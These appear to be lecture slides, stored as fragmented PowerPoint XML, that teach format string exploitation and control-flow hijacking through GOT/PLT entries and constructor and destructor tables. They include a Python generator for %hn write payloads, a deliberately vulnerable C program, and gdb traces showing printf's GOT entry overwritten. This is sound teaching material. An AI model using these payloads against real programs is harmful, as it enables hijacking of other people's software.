          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Print stack using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%x</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Or, use gdb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="396861" indent="-396861">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Use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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> to write data to the address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276996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Constructing a Value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="Shape 8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(gdb) r ’%0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250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32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x’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buf = 000000000000000000000000ffffd80c </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="321457" indent="-321457" defTabSz="321457">
              <a:spcBef>
                <a:spcPts val="844"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="98223" algn="l"/>
                <a:tab pos="321457" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="914">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="321457" indent="-321457" defTabSz="321457">
              <a:spcBef>
                <a:spcPts val="844"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="98223" algn="l"/>
                <a:tab pos="321457" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="914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/>
              <a:t>To control the number of bytes written, we must print that number of bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Padding useful to increase number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>e.g.,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%32x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> prints at least 32 characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74995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Writing Large Values</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821" name="Shape 821"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2193727" y="3471874"/>
            <a:ext cx="7804547" cy="332254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Usually, a large value is needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Addresses usually, well, large values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Trying to print millions of characters isn't feasible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Solution: Write value in multiple passes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>i.e., write two bytes or a byte at a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Writes must be ordered by value, not by address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Value must take previous values into account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Each write needs a separate address on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82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9597" y="1202685"/>
            <a:ext cx="2452807" cy="21337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6856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Shape 8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832" name="Shape 8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v0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0x1111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8</a:t>
            </a:r>
            <a:endParaRPr sz="1687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v1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0x2222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v0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8</a:t>
            </a:r>
            <a:endParaRPr sz="1687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base_addr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0xffffd7cc</a:t>
            </a:r>
            <a:endParaRPr sz="1687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base_off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</a:t>
            </a:r>
            <a:endParaRPr sz="1687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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687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pack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687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'&lt;II'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base_addr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base_addr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+=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'%0{0}x%{2}$hn%0{1}x%{3}$</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687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hn</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687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format(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v0,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v1,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base_off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base_off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sys</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687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stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687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write</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="168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68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1687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lang="en-US" sz="1687" dirty="0" smtClean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lang="en-US" sz="1687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1687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$ python gen_fmt_str.py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1687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XXXXXXXX%04361x%6$hn%08465x%7$hn</a:t>
            </a:r>
            <a:endParaRPr sz="1687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479516" y="1424721"/>
            <a:ext cx="3956795" cy="531933"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64924"/>
              <a:gd name="adj2" fmla="val 63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 you want to write (split in two)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3630907" y="2091591"/>
            <a:ext cx="4046483" cy="602265"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61244"/>
              <a:gd name="adj2" fmla="val 11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Address you want to write the value to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1411430" y="5635254"/>
            <a:ext cx="4046483" cy="602265"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2132"/>
              <a:gd name="adj2" fmla="val -130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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;$ means “use parameter &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;”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5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836" name="Shape 8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r ”$(cat input)”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Breakpoint 1, 0xf7d18450 in snprintf ()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x/xw 0xffffd7cc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0xffffd7cc: 0x0804869e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c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Continuing.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Program received signal SIGSEGV, Segmentation fault.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0x22221111 in ?? ()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x/xw $esp - 4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0xffffd7cc: 0x22221111 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410433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Memory References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53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For example, this C snippet...</a:t>
            </a:r>
            <a:endParaRPr sz="2531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53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data[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="253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8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data[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="253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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="253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53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4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531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53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...might translate to</a:t>
            </a:r>
            <a:endParaRPr sz="2531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53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53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53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253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-0x40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53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53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53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0x04</a:t>
            </a:r>
            <a:endParaRPr sz="2531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53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53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ecx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53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0x01</a:t>
            </a:r>
            <a:endParaRPr sz="2531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53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53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53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53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53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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="253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*4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="253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53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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176313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Function Pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="Shape 8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So far, we've considered several ways of hijacking function returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Overflowing stack buffers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Tricking the heap manager using fake chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>But, any function pointer can be used to hijack control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>PLT entries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>ctors, dtors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>vtable entries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4222411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PLT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="Shape 8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Dynamically-linked executables reference external (library) functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>But, it isn't known at link time where those functions will be located</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Procedure Linkage Table (PLT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Along with the Global Offset Table (GOT), used to implement runtime function resolution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>External function addresses cached</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128550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PLT Entries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="848" name="Shape 8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PLT references </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>writable function pointers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> in the GOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>These pointers are prime targets for hijacking execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Often, the PLT is conveniently mapped at a fixed address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Exploitation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Overwrite a PLT entry to point to attacker code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Drive the program execution to use the overwritten external function address in the PLT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188593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Function Resolution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="85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3547" y="1815029"/>
            <a:ext cx="4964906" cy="39647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6120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Function Resolution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="85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3547" y="1815029"/>
            <a:ext cx="4964906" cy="39647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828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Shape 8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Function Resolution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86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3547" y="1815029"/>
            <a:ext cx="4964906" cy="39647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6316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PLT Entries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864" name="Shape 8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(gdb) si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1: x/i $eip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0x8048699: call 0x8048490 &lt;snprintf@plt&gt;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(gdb) si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1: x/i $eip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=&gt; 0x8048490: jmp DWORD PTR ds:0x80499e8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(gdb) x/xw 0x80499e8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0x80499e8 &lt;snprintf@got.plt&gt;: 0x08048496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(gdb) si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1: x/i $eip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=&gt; 0x8048496: push 0x10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(gdb) si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1: x/i $eip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=&gt; 0x804849b: jmp 0x8048460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(gdb) fin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(gdb) x/xw 0x80499e8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0x80499e8 &lt;snprintf@got.plt&gt;: 0xf7d18450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(gdb) x/4i 0xf7d18450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0xf7d18450 &lt;snprintf&gt;: push ebx </a:t>
            </a:r>
            <a:endParaRPr sz="1620">
              <a:latin typeface="Times"/>
              <a:ea typeface="Times"/>
              <a:cs typeface="Times"/>
              <a:sym typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="231449" indent="-231449" defTabSz="231449">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="62506" algn="l"/>
                <a:tab pos="223234" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1620">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>0xf7d18451 &lt;snprintf+1&gt;: sub esp,0x18 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197185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Vulnerable Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Shape 8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main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argc,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argv)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buf[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256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snprintf(buf,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(buf), argv[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printf(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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"buf = %s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250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sz="225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buf);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277803" indent="-277803">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We'll use a format string exploit to overwrite the PLT entry for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printf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340789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872" name="Shape 8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(gdb) x/3i ’printf@plt’ </a:t>
            </a:r>
            <a:endParaRPr sz="2250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0x80484a0: jmp DWORD PTR ds:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250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0x80499ec </a:t>
            </a:r>
            <a:endParaRPr sz="2250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0x80484a6: push 0x18 </a:t>
            </a:r>
            <a:endParaRPr sz="2250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0x80484ab: jmp 0x8048460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endParaRPr sz="2250">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="277803" indent="-277803">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We want to place the address of our payload in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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>'s GOT entry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2022711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876" name="Shape 8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v0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0x1111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8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v1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0x2222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v0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8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base_addr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0x80499ec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base_off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struct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pack(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="168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'&lt;II'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base_addr, base_addr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'%0{0}x%{2}$hn%0{1}x%{3}$hn'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format(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v0,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v1,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base_off,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base_off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sys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stdout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write(buf)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="584955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Instruction Classes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Instructions commonly grouped by type of operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Load/store, arithmetic, logic, comparison, control transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We'll go through a few common examples from each</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Impossible to cover everything here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Compile programs, disassemble the output or capture assembly, and investigate!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44294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880" name="Shape 8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r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Breakpoint 1, main (argc=2, argv=0xffffd9b4)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9 snprintf(buf, sizeof(buf), argv[1])</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687" i="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;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x/x 0x80499ec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0x80499ec &lt;printf@got.plt&gt;: 0x080484a6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n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10 printf(”buf = %s\n”, buf)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687" i="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;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x/x 0x80499ec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0x80499ec &lt;printf@got.plt&gt;: 0x22221111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n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Program received signal SIGSEGV, Segmentation fault.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0x22221111 in ?? () </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232914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ctors, dtors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="884" name="Shape 8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There are (more) generic pointers lying around in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Constructors (ctors)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Functions registered to execute prior to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main</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Destructors (dtors)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Functions registered to execute after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main</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11769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Shape 8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ctors, dtors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="888" name="Shape 88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2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vuln_init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__attribute__((constructor));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2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vuln_init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printf(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2002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"starting up</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2002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sz="2002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endParaRPr sz="2002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2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vuln_fini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__attribute__((destructor));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2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vuln_fini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printf(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2002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"cleaning up</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2002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sz="2002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endParaRPr sz="2002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2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main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argc, </a:t>
            </a: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002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**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argv) {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2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buf[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2002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256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snprintf(buf, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2002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(buf), argv[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2002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]);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printf(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2002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"buf = %s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2002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sz="2002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buf);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2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2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2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2113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Shape 8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ctors, dtors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Shape 8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&gt; ./vuln blah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starting up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buf = blah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cleaning up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2250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/>
              <a:t>The compiler automatically registered our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init</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> and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fini</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> functions for execution as constructors and destructors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Initialization and finalization are handled by the C runtime (part of libc)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294429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_start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="896" name="Shape 8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_start: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clear frame pointer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esi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get argc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ecx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get argv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and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0xfffffff0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align the stack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0x80487b0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push __libc_csu_fini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0x8048740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push __libc_csu_init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ecx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push argv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esi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push argc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0x80486a0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push main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0x8048470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call __libc_start_main</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373106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__libc_csu_init</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="900" name="Shape 9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__libc_csu_init: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.loop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+0x38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25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exp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+0x08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+0x34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+0x04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ebx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edi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*4+0x38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edi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0x01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cmp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edi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esi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jne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.loop</a:t>
            </a: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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35876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ctors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906" name="Shape 9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x/4xw $ebx + 0x38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0x8049acc: 0x08048610 0x08048640 0x08048530 0x00000000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disas 0x08048610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Dump of code for function frame_dummy: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[...]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disas 0x08048640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Dump of code for function vuln_init():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[...]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disas 0x08048530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Dump of code for function _GLOBAL__I_a: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2208678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dtors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="910" name="Shape 9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For an attacker, dtors are a more attractive target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Usually, ctors have already executed, so overwriting a ctor pointer wouldn't have any effect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>dtors are also stored in a vector of function pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Not executed by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__libc_csu_fini</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>, instead by glibc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233629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Shape 9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dtors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914" name="Shape 9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Breakpoint 4, vuln_fini () at vuln.cpp:14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14 printf(”cleaning up\n”);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1: x/i $eip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=&gt; 0x8048689: mov DWORD PTR [esp],ecx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(gdb) bt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#0 vuln_fini ()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#1 0xf7feb60c in _dl_fini ()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#2 0xf7cfc721 in __run_exit_handlers ()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#3 0xf7cfc77d in exit ()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#4 0xf7ce499b in __libc_start_main () </a:t>
            </a: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#5 0x0804856f in _start () </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73960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dl_fini</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="918" name="Shape 9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x/8i 0xf7feb606</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
